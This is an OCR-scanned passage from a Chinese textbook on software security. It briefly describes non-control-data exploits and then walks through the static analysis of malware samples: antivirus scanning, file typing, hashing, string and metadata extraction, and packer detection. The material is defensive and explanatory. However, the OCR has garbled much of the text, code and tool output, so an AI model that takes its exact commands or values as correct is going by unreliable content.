root 权限 启动 特定 字符 串 指 定 的 程序 ,如 /bin/sh, 从 而 获得 系统 控制 权 。 在 这 些 漏洞 
利用 中 攻击 者 没有 插入 任何 shellcode, 同 时 也 没有 通过 覆盖 函数 返回 地 址 来 劫持 程序 
执行 权限 ,但 都 达到 了 攻击 目的 。 同 样 ,攻击 者 也 可 以 通过 算 改 保存 在 内 存 中 的 用 户 
身份 信息 实现 提 权 漏洞 利用 。 例 如 ,在 WU-FTPD 漏洞 中 ,攻击 者 通过 一 个 格式 化 字 
符 串 漏 洞 自 改 了 seteuid 的 参数 ,使 程序 具有 root 权限 。 而 如 果 应 用 程序 漏洞 恰好 能 够 
改变 某 条 关键 路 径 的 判断 条 件 ,那么 攻击 者 也 能 够 以 此 达到 漏洞 利用 目的 。 例 如 ,在 
dt SSH 服务 器 中 存在 一 个 整形 溢出 漏洞 .溢出 数据 能 够 覆盖 一 个 条 件 分 支 所 判断 的 条 
件 变量 ,攻击 者 通过 将 这 个 条 件 变 量 算 改 为 真 , 使 程序 执行 至 对 应 条 件 分 支 ,达到 了 提 
升 权 限 的 攻击 目的 。 

非 控 制 流 支持 类 漏洞 利用 的 特点 是 攻击 者 不 需要 插入 并 执行 一 段 shellcode 来 达到 
攻击 目的 ,而 是 通过 修改 上 述 非 控制 相关 数据 ,造成 程序 执行 路 径 或 者 执行 环境 发 生 改 
变 , 进 而 达到 漏洞 利用 攻击 的 目的 。 这 种 漏洞 利用 攻击 不 会 触发 GS, SEHOP, DEP 等 漏 
洞 利用 预防 措施 的 报警 ,也 不 会 受到 ASLR 等 漏洞 利用 缓解 措施 的 影响 ,因此 ,在 漏洞 利 
用 过 程 分 析 中 需要 加 以 注意 。 关 于 软件 漏洞 分 析 的 详细 介绍 参见 第 9 章 。 
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静态 分 析 通 常 是 恶意 代码 分 析 的 第 一 步 ,由 于 不 需要 实际 运行 恶意 代码 ,因此 静态 分 
析 对 分 析 环 境 的 要 求 不 高 ,有 很 多 优秀 的 工具 能 够 帮助 我 们 开展 静态 分 析 工 作 , 因 此 , 静 
态 分 析 过 程 相对 来 说 较为 容易 。 
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在 拿 到 可 疑 样 本 的 时 候 , 首 先 ,需要 确定 可 疑 样本 是 不 是 已 被 主流 的 安全 工具 确认 为 
恶意 代码 ,这 一 步 通常 可 以 利用 杀毒 软件 对 可 疑 样 本 进行 扫描 ,根据 扫描 结果 判断 。 当 
前 ,有 很 多 杀毒 软件 可 以 选择 ,除了 需要 付费 购买 使 用 授权 的 商业 软件 ,还 可 以 选择 开源 
的 杀毒 软件 ,如 ClamA V9, Et Windows, MacOS X, Linux 和 BSD 等 多 种 操作 系统 。 
由 于 杀毒 软件 主要 是 基于 代码 特征 ,数据 特征 等 构成 的 病毒 库 进 行 匹 配 和 检测 ,并 且 各 个 
杀毒 软件 的 病毒 库 覆 盖 范 围 和 更 新 速度 也 有 较 大 差异 ,因此 采用 单一 的 杀毒 软件 进行 扫 
描 可 能 无 法 准确 识别 已 知 的 恶意 软件 。 可 以 采用 多 个 杀毒 软件 对 可 疑 样本 进行 扫描 ,从 
而 更 好 地 确认 可 疑 样本 是 否 为 已 知 的 恶意 代码 。 例 如 ,可 以 把 可 疑 样本 上 传 到 
VirusTotal? 网 站 ,利用 该 网 站 提供 的 数 十 个 不 同安 全 厂商 研发 的 杀毒 软件 对 可 疑 样 本 
进行 扫描 检测 ,综合 不 同 杀 毒 软件 的 扫描 结果 更 好 地 确认 可 疑 样本 是 否 具 有 恶意 性 。 需 
要 注意 的 是 ,对 于 一 些 在 敏感 环境 中 发 现 的 恶意 代码 ,或 者 可 能 包含 敏感 内 容 的 恶意 代 
K ,不 能 随意 上 传 到 类 似 的 扫描 网 站 ,以 免 造 成 敏感 信息 泄露 。 在 这 种 情况 下 ,可 以 在 获 
得 样本 文件 的 MD5 值 之 后 ,通过 网 址 https://www. virustotal. com/latest-scan/ + MD5 
直接 访问 VirusTotal 网 站 上 该 样本 的 分 析 结 果 报 告 页 面 。 若 该 样本 已 经 被 其 他 用 户 上 
传 并 分 析 过 , 则 网 站 会 显示 样本 的 分 析 结 果 ; 若 样本 尚未 被 上 传 分析 过 , 则 会 提示 文件 未 
找到 (“File not found”) 人 信息。 类似 地 ,可 以 通过 # totalhash@ 网 站 ,利用 恶意 代码 相关 的 
文件 名 、 哈 希 值 IP 地 址 ` 互 斥 量 名 注册 表 键 值 `.URL 等 关键 词 查询 相关 恶意 代码 是 否 
已 经 被 分 析 过 。 


822 文件 类 型 确定 


无 论 是 否 已 经 确认 可 疑 样本 为 恶意 代码 ,在 开展 进一步 的 分 析 之 前 ,都 需要 确定 样本 
文件 的 类 型 ,以便 在 后 续 分 析 工 作 中 选取 合适 的 分 析 方 法 和 工具 。 通 常 ,可疑 样本 文件 带 
有 准确 的 后 绥 名 ,如 . exe 等 ,可 以 根据 后 绥 名 确定 样本 文件 的 类 型 。 这 里 需要 注意 的 是 ， 
同一 类 别 的 文件 可 能 有 和 多 种 形式 的 后 级 名 ,如 除了 . exe 之 外 ,. scr、. cpl 等 都 是 可 执行 文 
件 。 但 在 有 些 情况 下 ,可 疑 样 本 可 能 没有 后 缀 名 .或 者 后 级 名 不 正确 ,如 . bin、. data 等 ,很 
难 通过 后 级 名 推断 样本 文件 的 实际 类 型 。 在 这 种 情况 下 ,有 一 些 现成 的 工具 可 以 帮助 我 


Q http://www. clamav. net/. 
®© http://www. virustotal. com/. 
G  https://totalhash. cymru. com/. 
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们 推断 样本 文件 的 类 型 ,如 file 工具 ,该 工具 利用 一 个 文件 魔 数 数据 库 (magic. db) 识 别 不 
同类 型 的 文件 格式 ,在 大 多 数 Linux 发 行 版 中 都 包含 该 工具 ,同时 也 有 第 三 方 制作 的 
Windows 版 本 了 。 该 工具 的 使 用 方式 如 下 : 


user@ ubuntu:~ /trid$ file trid 
trid: ELF 64-bit LSB executable, x86- 64, version 1 (SYSV), dynamically linked (uses shared 
libs), for GNU/Linux 2.6.24, stripped 


从 输出 结果 看 以 看 出 ,样本 文件 是 一 个 64 位 的 ELF 格式 可 执行 文件 ,采用 动态 链接 
形式 ,已 经 去 除了 调试 信息 。 

TrID 也 是 一 个 依据 不 同 格式 文件 的 特征 来 识别 未 知 文件 类 型 的 工具 ,与 file 工具 相 
比 , 它 的 可 扩展 性 更 好 ,支持 自 定义 的 格式 特征 ,同时 支持 Windows 和 Linux 平台 ®, 并 
且 提 供 在 线 识别 服务 Online TrID File Identifier9。 该 工具 的 使 用 方式 如 下 : 


d:\TrID> trid.exe file 


TrID/32 -File Identifier v2.20 - (C) 2003- 15 By M.Pontello 
Definitions found: 5800 
Analyzing... 


Collecting data from file: file 
42.1% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13) 
37.3% (.EXE) Win64 Executable (generic) (27652/42/4) 

8.8$ (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2) 

6.0$ (.EXE) Win32 Executable (generic) (4508/7/1) 

2.7% (.EXE) Generic Win/DOS Executable (2002/3) 


从 TrID 的 输出 结果 可 知 ,其 对 未 知 文件 的 类 型 推测 结果 是 概率 性 的 ,对 于 类 型 相同 
或 相近 ,但 后 级 名 不 同 的 文件 格式 ,有 可 能 无 法 准确 区 分 ,这 也 是 类 似 工具 的 普遍 局 限 性 。 

类 似 的 文件 类 型 分 析 工 具 还 有 Oracle Outside In 工具 套件 中 的 File ID@, 它 可 以 识 
别 500 多 种 常见 应 用 相关 的 文件 类 型 ,尤其 是 文档 等 数据 文件 的 类 型 。 该 工具 的 使 用 方 
Xam. 


d: VOracle Outside InVFile ID 8.5.0\sdk\demo> fisimple.exe wvcore.dll 
File : wvcore.dll -ID : 1800 (0x0708) -String ID name: EXE / DLL File 


823 文件 哈 希 计算 
通过 计算 并 比较 一 个 文件 的 哈 希 值 , 可 以 快速 找到 相同 的 文件 。 在 恶意 代码 分 析 中 ， 


http://www. optimasc. com/products/fileid/index. html. 

http: //mark0. net/soft-trid-e. html. 

http: //mark0. net/onlinetrid. aspx. 

http://www. oracle. com/us/technologies/embedded/025613. htm. 


eece 
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利用 样本 文件 的 哈 希 值 可 以 识别 相同 的 恶意 代码 ,有 时 还 能 找到 其 他 安全 人 员 对 相同 样 
本 的 分 析 结 果 , 从 而 避免 重复 分 析 。 常 见 的 哈 希 算法 包括 循环 元 余 校 验算 法 CRC32 
(Cyclic Redundancy Check) ,消息 摘要 算法 MD5 (Message-Digest Algorithm 5) ,安全 哈 
希 算 法 SHA1 (Secure Hash Algorithm 1) 等 。 有 很 多 工具 可 以 用 于 计算 文件 哈 希 值 ,如 
XA Linux 系统 都 自 带 计算 MD5 哈 希 值 的 命令 md5sum 以 及 计算 SHA 哈 希 值 的 命 


今 shasum: 


user@ ubuntu:~$ shasum --help 

Usage: shasum [OPTION]... [FILE]... 

Print or check SHA checksums. 

With no FILE, or when FILE is -, read standard input. 


-a, --algorithm 1 (default), 224, 256, 384, 512, 512224, 512256 
-b, --binary read in binary mode 
=c, -- check read SHA sums from the FILEs and check them 
-p, -portable read files in portable mode 

produces same digest on Windows/UNIX/Mac 
-t, --text read in text mode (default) 


The following two options are useful only when verifying checksums: 


-s, -- status don't output anything, status code shows success 
-w, -- warn warn about improperly formatted checksum lines 
-h, -- help display this help and exit 

=v, -- version output version information and exit 


user@ ubuntu:~$ shasum a.out 
da39a3ee5e6b4b0d3255bfef95601890afd80709 a.out 


在 Windows 平台 上 也 有 很 多 图 形 化 的 哈 希 计算 工具 , 如 HashXO、Hash@、 


WinMD5 等 ,如 图 8-1 所 示 为 利用 HashX 计算 文件 的 SHAI 哈 希 值 的 输出 结果 。 


由 于 对 于 一 个 可 疑 样本 ,无 论 是 采用 MD5 还 是 SHA1 算法 获得 的 哈 希 值 都 是 确定 


并 且 唯 一 的 ,因此 一 旦 得 到 了 可 疑 样本 的 哈 希 值 ,可 以 该 哈 希 值 为 关键 词 , 利 用 搜索 引擎 
检索 是 否 已 经 有 关于 该 可 疑 样本 的 相关 信息 。 同 时 ,在 出 具 分 析 结果 报告 时 , 哈 希 值 也 可 
以 作为 可 疑 样本 的 唯一 标识 , 供 其 他 分 析 人 员 确 定 可 疑 样 本 与 分 析 报告 之 间 的 对 应 关系 。 


然而 ,由 于 喻 希 值 计算 方法 的 雪崩 效应 ,在 恶意 代码 发 生 少许 变化 时 ,如 文件 时 间 截 


改变 ,增加 若干 字 节 等 ,文件 的 哈 希 值 将 完全 不 同 。 为 了 发 现 这 些 仅仅 发 生 少许 变化 的 不 
同 恶 意 代码 之 间 的 关联 关系 ,可 以 采用 模糊 哈 希 (fuzzy hashing) 算 法 。 模 糊 哈 希 算法 又 


(D http://www. boilingbit. com/. 
Q  http://keir. net/hash. html. 
G http://www. blisstonia. com/software/WinMD5/. 
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FP, Hashx 


— File to hash 
C: \work\sanples\ActiveX, exe 














— Hash algorithm 
SHA-1 
— Output format 














OLowercase, no spaces Uppercase, no spaces 
O Lowercase O 〇 Uppercase 

— Output 
BIZSCCTIAKEZC IZAGFEBEISGOIElITZAZBBDCIA À Copy Output 











一 Compare with [Paste text below] — — — — 





(P About... 
[E] Exit Hasht 














图 8-1 利用 HashX 计算 文件 哈 希 值 


称 基 于 内 容 分 割 的 分 片 喻 希 算法 (Context Triggered Piecewise Hashing, CTPH), 它 对 
文件 的 部 分 变化 不 敏感 ,即使 在 多 处 修改 .增加 、 删 除 部 分 内 容 的 情况 下 ,使 用 模糊 哈 希 算 
法 仍 能 发 现 修改 后 的 文件 与 源 文件 的 相似 关系 ,是 目前 判断 文件 相似 性 的 一 种 较 好 方法 。 
可 以 采用 ssdeep? 计算 文件 的 模糊 哈 希 值 , 该 工具 的 使 用 方式 如 下 : 

c:\work\tools\ssdeep- 2.11» ssdeep.exe c:\work\samples\ActiveX.exe 

ssdeep,1.1- -blocksize:hash:hash, filename 


12288:x- uEVYYmBd2VgoWNKK1iZ8qRP/FWKSJeku: xVEVYYUZAKGqRXFIJM, " c: \work\ samples ActiveX. 


exe" 


利用 ssdeep 工具 ,可 以 计算 各 个 样本 的 模糊 喻 希 值 ,并 通过 比较 模糊 喻 希 值 之 间 的 
相似 性 ,发 现在 传播 .感染 过 程 中 存在 主动 变化 或 被 动 修改 过 的 恶意 代码 之 间 的 相关 性 。 

对 于 文件 内 容 变 化 较 大 的 两 个 恶意 代码 ,如 对 同一 份 源 代码 做 了 一 些 修 改 后 的 两 次 
不 同 编译 产生 的 可 执行 文件 ,即使 是 采用 模糊 哈 希 算法 也 很 难 发 现 两 者 之 间 的 相似 性 ,在 
这 种 情况 下 ,分 析 人 员 可 以 考虑 采用 imphash (import hash)@ 进 行 相似 性 比较 。imphash 
是 美国 Mandiant 公司 安全 团队 提出 的 一 种 计算 恶意 代码 的 导入 地 址 表 的 哈 希 值 的 方法 。 
一 个 程序 的 导入 表 是 其 调用 的 其 他 库 文件 中 的 函数 的 集合 ,由 于 导入 表 是 在 代码 编译 时 
自动 产生 的 ,并 且 导 入 表 中 的 函数 顺序 与 其 在 源 代码 中 的 出 现 顺序 相对 应 ,因此 ,导入 表 
可 以 较 好 地 反映 出 看 似 不 同 的 两 份 可 执行 代码 与 同一 份 源 代码 之 间 的 对 应 关系 。 

为 了 便于 不 同 工 具 计算 的 imphash 之 间 相 互 可 比较 ,计算 imphash 应 遵循 如 下 
规范 : 

CD 将 导入 表 中 出 现 的 函数 序号 转换 为 函数 名 。 


(D http://ssdeep. sourceforge. net/. 
Q https://www. mandiant. com/blog/tracking-malware-import-hashing/. 
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(2) 将 动态 链接 库 名 和 函数 名 都 转换 为 小 写字 母 的 形式 。 

(3) 从 导入 模块 名 中 去 除 文件 后 绥 名 。 

(4) 将 所 有 小 写字 母 的 字符 串 保 存 为 一 个 顺序 列表 。 

(5) 计算 该 顺序 列表 的 MD5 值 作 为 imphash。 

目前 ,pefile? 工具 已 经 支持 计算 一 个 PE 文件 的 imphash, 其 算法 具体 实现 在 pefile 
1. 2. 10-139 版 本 的 pefile. py 文件 中 ,可 以 通过 如 下 的 示例 代码 调用 相关 函数 计算 任意 
PE 文件 的 imphash 值 : 


pe=pefile.PE("c:\\work\\samples\\ActiveX.exe ") 
a-pe.get imphash() 
print "Import Hash: $s" $a 


824 字符 串 信 息 提取 


恶意 代码 中 包含 的 文本 字符 串 信 息 常常 可 以 提供 一 些 关 于 恶意 代码 类 型 .功能 ,用途 
等 的 有 用 信息 。 通 过 抽取 出 恶意 代码 中 的 文本 字符 串 , 有 时 可 以 从 中 发 现 一 些 意 想不到 
的 信息 ,如 恶意 代码 访问 的 URL、 使 用 的 邮箱 ,甚至 登录 邮箱 的 用 户 名 、 密 码 等 信息 。 在 
Linux 系统 中 ,通常 默认 包含 了 strings 命令 ,通过 该 命令 可 以 提取 恶意 代码 中 的 字符 串 
信息 ,该 工具 的 使 用 方式 如 下 : 

user@ ubuntu:^ /trid$ strings trid 

/1ib64/1d- linux- x86- 64.0.2 

libtinfo.so.5 

. mon start .— 

_Jv RegisterClasses 


libpthread.so.0 
pthread mutex destroy 
pthread mutex init 


在 Windows 系统 中 ,可 以 利用 Sysinternals 工具 @ 套 件 中 的 是 strings 命令 行 工 具 。 
对 于 大 多 数 程序 ,strings 提取 出 来 的 字符 串 内 容 非常 多 ,可 以 将 其 重 定向 到 一 个 文本 文 
件 ,以 便 更 好 地 观察 其 中 是 否 包 含有 用 的 信息 。 


d:\> strings.exe sync.exe > sync.exe.txt 


Strings v2.41 
Copyright (C) 1999- 2009 Mark Russinovich 


Sysinternals -www.sysinternals.com 


(D http://code. google. com/p/pefile/. 


Q  www.sysinternals. com. 
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! This program cannot be run in DOS mode. 
Es 


FormatMessageA 
DeviceloControl 
GetFileAttributesA 
Sleep 


需要 注意 的 是 ,由 于 strings 工具 在 扫描 输入 文件 时 按照 符合 文本 字符 串 存 储 格式 并 
且 长 度 大 于 3 个 字符 的 规则 识别 字符 串 , 因 此 其 输出 中 会 包含 大 量 无 意义 的 虚假 字符 串 
信息 ,可 能 会 将 真正 有 意义 的 文本 字符 串 淹没 。 此 时 ,可 以 通过 按照 文本 字符 串 长 度 从 长 
到 短 排序 的 方式 对 结果 进行 排序 。 由 于 有 意义 的 文本 字符 串通 常 较 长 ,长 度 越 短 , 越 有 可 
能 是 虚假 字符 串 , 因 此 按 长 度 排序 后 可 以 将 真正 有 意义 的 字符 串 提 到 前 面 ,避免 大 量 无 意 
义 的 虚假 字符 串 造 成 的 干扰 。 
825 文件 元 数据 提取 

在 确定 了 可 疑 样本 的 文件 类 型 之 后 ,可 以 根据 具体 的 文件 类 型 提取 相应 的 文件 元 数 
据 信息 。 如 对 于 PE 文件 ,可 以 提取 文件 头 信息 ,根据 文件 头 大 小 .入 口 点 地 址 .代码 镜像 
基 址 ,文件 节 数 ,以 及 导入 表 、 导 出 表 的 地 址 和 大 小 等 信息 ,初步 判断 该 文件 是 否 异 常 ,是 
否 存 在 加 壳 等 保护 措施 ,从 而 判断 在 后 续 分 析 中 是 否 需 要 采取 脱 壳 等 应 对 措施 。PE X 
件 的 元 数据 提取 工具 有 很 多 ,如 命令 行 工具 pev?、 图 形 化 工具 Exeinfo PE? 等 。 


c:\work\tools\pev> readpe.exe c:\work\samples\ActiveX.exe 


DOS Header 

Magic number: 0x5a4d (MZ) 
Bytes in last page: 144 
Pages in file: 3 
Relocations: 0 
Size of header in paragraphs: 4 
Minimum extra paragraphs: 0 
Maximum extra paragraphs: 65535 
Initial (relative) SS value: 0 
Initial SP value: Oxb8 
Initial IP value: 0 
Initial (relative) CS value: 0 
Address of relocation table: 0x40 
Overlay number: 0 


(D http://pev. sourceforge. net/. 
Q  http://exeinfo. atwebpages. com/. 
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OEM identifier: 0 
OFM information: 0 
PE header offset: OxcO 


COFF/File header 


Machine: Oxl4c IMAGE FILE MACHINE 1386 

Number of sections: 4 

Date/time stamp: 708992537 (Fri, 19 Jun 1992 22:22:17 UTC) 
Symbol Table offset: 0 

Number of symbols: 0 

Size of optional header: Oxe0 

Characteristics: 0x30e 


IMAGE FILE EXECUTABLE IMAGE 
IMAGE FILE LINE NUMS STRIPPED 
IMAGE FILE LOCAL SYMS STRIPPED 
IMAGE FILE 32BIT MACHINE 

IMAGE FILE DEBUG STRIPPED 


图 8-2 显示 了 利用 Exeinfo PE 工具 查看 PE 文件 头 属性 信息 的 截图 。 


Header info : [ exeinfope.exe ] - Size of Code : 104000h - decimal : 1.02 MB Bn 





Directory Info: RVA SIE m PERERIN 


























Export: O61ED000 0000004F [5>] (02)UPX1 E 
iot: 55657615 Gooomaré [5] (03) rae | muefeemahende: s Lone 
Resource: 06278000 (00004618 1 % of exe DA | NumberofOrs: 10 10h 
:55006600 65600000 - Base of Code : 177000 1000 
(0000000 00000000 Image Base 
Base Rioc: 5000000 Po000000™ | = 
Debug : oD00000 Po000000 | Fe offset tore boo [GE 
: Poo00000 poo00000— Chedksum RC : [Im 00000000 
pelea exeo (pere g Nadine tpe : 
TSTabe: 0627028 (00000018 [55] (02)UPXi m: ——— 
Load Confg : P000000  E0000000 ce [eo ERIEINININNES 
Bound Import: 0000000 ^ 00000000 Not used From file. File icon: 
darin) [0000000 — D0000000  Notused Epoint to EOF bytes : 22384 m 
File last bytes : ( Last 12 ) 
Cen = Down: ME scie (00 00 00 00 00 00 00 00 00 00 00 00 








ASM: 0070 / VC ++: 0102 / Delphi:0100 / .NET - Pelles C:0080/ MS VB: 0088 osm] 


图 8-2 Exeinfo PE 的 文件 头 信息 输出 


此 外 ,对 于 PE 文件 确认 文件 是 否 有 合法 签名 也 是 一 个 重要 的 信息 ,最 简单 的 方式 是 


选中 并 右 击 程序 文件 ,在 快捷 菜单 中 选择 属性 (Properties ) 命令 , 单 击 数字 签名 (Digital 
Signatures) 标 签 进行 查看 。 对 于 经 过 签名 的 Windows 系统 程序 文件 ,Authenticodeb5 可 
确定 签名 软件 的 发 行者 身份 ,并 核实 软件 没有 被 算 改 过 。 利 用 Sysinternals 工具 集中 的 
sigcheck 命令 行 工具 ,也 可 以 快速 查看 程序 是 否 有 合法 签名 。 需 要 注意 的 是 ,在 一 些 高 级 
攻击 活动 中 ,攻击 者 有 可 能 会 利用 窃取 的 合法 证 书 对 恶意 代码 进行 签名 ,因此 不 能 仅仅 根 
据 程序 有 合法 签名 就 确认 其 不 是 恶意 代码 。 


对 于 非 可 执行 代码 文件 ,如 文档 、 图 片 等 可 疑 文 件 , 可 以 根据 具体 的 文件 格式 提取 和 


Ne/ 软件 安全 分 析 与 应 用 


查看 诸如 文件 大 小 、 页 数 、 字 数 、 格 式 版 本 、 创 建 者 、 创 建 时 间 、 编 辑 时 间 、 是 否 包 含 权 限 控 
制 等 各 种 各 样 的 信息 。 可 以 利用 Metadata Extraction Tool? 这 样 的 元 数据 提取 工具 ,对 
不 同类 型 的 文件 进行 处 理 ,该 工具 支持 BMP、GIF、JPEG 和 TIFF 格式 的 图 片 , MS 
Word, WordPerfect, OpenOffice, MS Works, MS Excel, MS PowerPoint 和 PDF 格式 的 
文档 ,HTML 和 XML 格式 的 标记 语言 文件 ,以 及 WAV、MP3、BFW、FLAC 格式 的 音 视 
频 文件 。 然 而 ,由 于 文件 类 型 众多 ,很 难 用 统一 的 方式 进行 处 理 ,因此 ,很 多 时 候 针对 不 同 
的 格式 采用 不 同 的 分 析 工 具 更 为 合适 。 如 对 于 Office 文档 ,可 以 利用 file 工具 ;对 于 
OpenOffice 格式 的 文档 ,可 以 利用 OOMetaExtractor@ 等 工具 ;对 于 PDF 文件 ,可 以 利用 
xpdf@ 工具 ;对 于 图 片 文件 ,可 以 利用 exiftool? 工具 等 。xpdf 工具 的 使 用 方式 如 下 : 


C:\work\tools\xpdf> pdfinfo.exe "c:\work\samples\IPR in China FINAL.pdf" 
Syntax Warning: PDF version aaa - - xpdf supports version 1.7 (continuing anyway) 


Syntax Error: Couldn't read xref table 
Syntax Warning: PDF file is damaged -attempting to reconstruct xref table... 


Title: 

Author: 

Creator: Acrobat PDFMaker 7.0 for Word 
Producer: Acrobat Distiller 7.0 (Windows) 
CreationDate: 06/26/09 16:25:57 

ModDate: 12/03/09 14:56:34 

Tagged: no 

Form: none 

Pages: * 

Encrypted: no 

Page size: 595.22 x 842 pts (A4) (rotated 0 degrees) 
File size: 54720 bytes 

Optimized: yes 

PDF version: 0.0 


MEH xpdf 工具 输出 的 样本 PDF 文件 属性 信息 可 以 看 出 ,该 文件 的 格式 存在 异常 ， 
因此 很 可 能 是 包含 了 攻击 代码 的 恶意 文件 。 
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恶意 代码 为 了 减少 代码 体积 ,逃避 安全 检测 ,对抗 安全 分 析 , 通 常会 采用 代码 压缩 、 加 
密 、 加 壳 等 形式 的 代码 变换 和 保护 措施 。 由 于 代码 加 密 、 加 过 之 后 ,分 析 人 员 无 法 利用 静 
态 反 汇编 等 手段 直接 查看 真正 的 恶意 代码 ,导致 静态 代码 分 析 难 以 开展 。 因 此 ,在 进行 恶 


http://meta-extractor. sourceforge. net/. 
http://oometaextractor. codeplex. com/. 


http://www. foolabs. com/xpdf/. 


eeceo 


http://exiftool. sourceforge. net/. 
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意 代 码 静 态 分 析 时 ,一 个 很 重要 的 步骤 就 是 确定 恶意 代码 是 否 采取 了 加 这 等 自 保护 措施 ， 
并 进而 确定 采用 的 是 何 种 保护 措施 ,以 及 如 何 去 除 这 种 保护 措施 ,还 原 真 实 的 恶意 代码 。 

代码 保护 的 技术 有 很 多 种 ,成 熟 的 工具 也 有 很 多 ,如 UPX、Armadillo、ASPack、 
ASProtect, PECompact, PELock, Themida, VMProtect 等 。 由 于 各 个 工具 采用 的 代码 变 
换 技 术 和 压缩 .加 密 算法 各 不 相同 ,因此 ,无 法 用 统一 的 方式 处 理 。 但 是 ,由 于 每 种 代码 保 
护 工具 都 有 其 自身 特点 ,因此 ,在 采用 某 种 工具 对 恶意 代码 进行 保护 之 后 ,处 理 后 的 恶意 
代码 通常 带 有 该 种 工具 特有 的 特征 ,如 特定 的 字符 、 特 殊 的 节 、 特 定 的 入口 点 位 置 等 信息 ， 
通过 这 些 特征 ,分 析 人 员 可 以 识别 一 个 恶意 代码 采用 的 是 何 种 代码 保护 技术 和 工具 ,从 而 
根据 具体 工具 的 代码 保护 算法 进行 相应 的 处 理 。 

与 文件 类 型 推断 工具 类 似 ,代码 保护 技术 推断 工具 也 需要 依赖 特征 库 来 识别 相应 的 
代码 保护 工具 。 常 用 的 识别 工具 包括 PEiD?、Sigbuster、TrID、pev 等 。 图 8-3 显示 了 利 
用 PEiD 扫描 一 个 未 加 这 的 可 疑 代码 的 结果 ,从 结果 可 以 看 出 ,该 样本 文件 是 一 个 利用 
Microsoft Visual C++ v7.0 编写 的 代码 。 图 8-4 显示 了 一 个 利用 PEtite 工具 进行 代码 保 
护 的 可 疑 代码 的 结果 。 





Pe PEiD v0.95 





File: |CiworkisampleslActiveX.exe 


Entrypoint: 00001004 — — 
File Offset: 0001004 ——— 
Linker Info: &21 — 





Microsoft Visual C++ v7.0 [Overlay] * 
Stay ontop 


Pe pEiD v0.95 





File: |Ciwork|sampleslmysysdir.exe. 


Entrypoint: DOOIAD42 —— 
File Offset: 00000442 ——— First Bytes: B8,00,A0,41 |G) 
Linker Info: 50 — Subsystem: Win32 GUI (GJ 





PEtite 2.x [Level 1/9] -» Tan Luck 
Mu scan ) [Iaskwewer] [options ] (abou | C Ext 
[v]stay on top. [e] 








图 8-4 PEiD 识别 加 这 代码 的 结果 


如 果 需 要 同时 扫描 大 量 的 样本 文件 ,PEiD 还 可 以 支持 批量 扫描 ,通过 Multi Scan f 


(D http://peid. has. it/. 
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钮 对 目录 中 的 样本 文件 进行 逐一 检测 ,结果 如 图 8-5 Bron. 


"f PEiD Nultiple File Scanner v0.02 





File Info 
Cilexploitisample|EXElTrojan.Nugache.A... Nothing found * 
CrlexploitisamplelEXElTrojan.PSW.Sinow... AHTeam EP Protector 0.3 (Fake PCGuard 4.03-... 
Cilexploitisample|EXElTrojan.Srizbi.AV.exe — VMProtect 1.70.4-» phpbb3 * 
CilexploitisamplelEXElTrojan.SrizbiDrop... YMProtect 1.70.4-» phpbb3 * 
CrlexploitisamplelEXEVTrojan.Srizbi.Drop... WMProtect 1.70.4-» phpbb3 * 
C:lexploitisample|EXEVTrojan.Vundo.EPW... Nothing found * 
CilexploitisamplelEXEYW32.Duqu Droppe... Microsoft Visual C++ 6.0 
CilexploirlsamplelEXEYW32.StormWorm.... Borland Delphi 3.0 (???) * 
C:VexploitisampleVEXElWaledac.Q malwar... UPX -> www.upx.sourceforge.net * 


CilexploitisamplelEXElWin32.Rootkit.Pan... Visual C++ 2003 DLL -> Microsoft * 
[I — zm — m— | 


re, E 





Recursive Scan 








identified 49 of 79 files in 0.25 seconds I 





图 8-5 利用 PEiD 进行 批量 扫描 


由 于 PEiD 依赖 特征 数据 库 文件 userdb. txt 来 识别 代码 保护 工具 ,因此 ,特征 数据 库 
包含 的 各 个 工具 的 识别 特征 是 否 完善 ,准确 直接 影响 到 PEiD 扫描 结果 的 准确 性 。 很 多 
恶意 代码 分 析 人 员 编 制 并 共享 了 各 自 的 特征 数据 库 文 件 ,可 以 从 以 下 网 址 获得 不 同 来 源 
的 特征 数据 库 文件 : 

http://handlers. sans. org/jclausing/userdb. txt 

http: //reverse-engineering-scripts. googlecode. com/files/UserDB. TXT 

http: //research. pandasecurity. com/blogs/images/userdb. txt 

除了 采用 他 人 共享 的 特征 数据 库 文件 ,分 析 人 员 也 可 以 自己 编辑 ,修改 特征 数据 库 文 
件 , 修 正 错 误 的 识别 特征 ,增加 新 的 识别 特征 ,从 而 识别 不 断 变 化 、 新 增 的 代码 保护 方法 和 
工具 。 可 以 利用 PEiD 的 特征 数据 库 文件 编辑 器 PEiD UserDB Editor? 对 特征 数据 库 进 
行 编 辑 。 

除了 PEiD 自身 使 用 外 ,PEiD 的 特征 数据 库 还 被 很 多 安全 分 析 工 具 广泛 采用 ,如 分 
析 人 员 可 以 通过 利用 peid2yar? 工具 ,将 PEiD 的 特征 数据 库 转 化 为 YARA 工具 可 以 
识别 的 形式 ,从 而 利用 Y ARA 进行 自动 化 的 加 壳 代 码 扫描 与 识别 。 

在 确定 了 可 疑 样本 采用 的 代码 保护 工具 之 后 ,分 析 人 员 可 以 尝试 去 除 恶意 代码 作者 
施加 的 代码 保护 措施 ,还 原 真 实 的 恶意 代码 。 通 常 ,这 一 过 程 是 困难 的 ,并 且 并 非 所 有 的 
受 保护 代码 都 可 以 逆向 还 原 , 但 对 于 常见 的 代码 保护 工具 ,分 析 人 员 仍 然 有 可 能 快速 将 其 
去 除 , 获 得 真实 的 恶意 代码 。 例 如 ,对 于 Inno 安装 包 、UPX 压缩 等 普通 打包 压缩 工具 ,可 
以 利用 UniExtract 工具 自动 解 包 、 解 压缩 ,提取 其 中 的 真实 代码 文件 。 而 对 于 采用 更 高 
级 的 代码 保护 工具 的 可 疑 样 本 ,可 以 通过 搜索 引擎 查找 是 否 存在 该 工具 对 应 的 脱 壳 工具， 
避免 手工 脱 壳 带 来 的 重复 工作 。 对 于 一 些 可 逆 的 代码 保护 方法 ,可 以 尝试 利用 PEiD T. 


(D https://sourceforge. net/projects/peidextsigedit/. 
Q  https://github. com/AlienVault-Labs/AlienVaultLabs/tree/master/peid2yar. 
G  http://plusvic. github. io/yara/. 
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具 支 持 的 插件 功能 ,如 图 8-6 所 示 ,通过 选择 与 代码 保护 工具 相应 的 插件 实现 对 受 保护 代 
码 的 自动 还 原 。 如 果 无 法 通过 现 有 工具 实现 自动 脱 壳 ,也 可 以 通过 通用 的 原始 入口 点 查 
找 插件 (Generic OEP Finder) 等 获得 加 壳 代 码 的 原始 入口 点 ,并 进一步 利用 调试 器 等 工 
